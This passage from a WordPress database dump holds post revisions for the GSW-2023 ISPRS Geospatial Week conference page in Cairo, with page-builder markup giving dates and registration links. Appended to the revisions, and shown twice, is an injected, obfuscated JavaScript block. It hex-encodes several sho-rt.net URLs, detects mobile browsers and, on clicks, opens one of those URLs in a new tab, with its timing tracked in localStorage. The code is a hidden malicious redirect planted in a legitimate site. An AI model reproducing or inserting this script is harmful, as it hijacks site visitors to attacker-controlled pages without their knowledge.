_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 18:04:50','2022-11-09 18:04:50','',3066,'https://gsw2023.com/?p=3178',0,'revision','',0),
(3179,1,'2022-11-09 18:08:17','2022-11-09 18:08:17','[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\r\n<h3><strong> EGYPT GSW\'2023</strong></h3>\r\n[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]\r\n<h3></h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668017293423{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^2275|url^https://gsw2023.com/wp-content/uploads/2022/10/aast32.jpg|caption^null|alt^null|title^aast32|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668010285886{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return 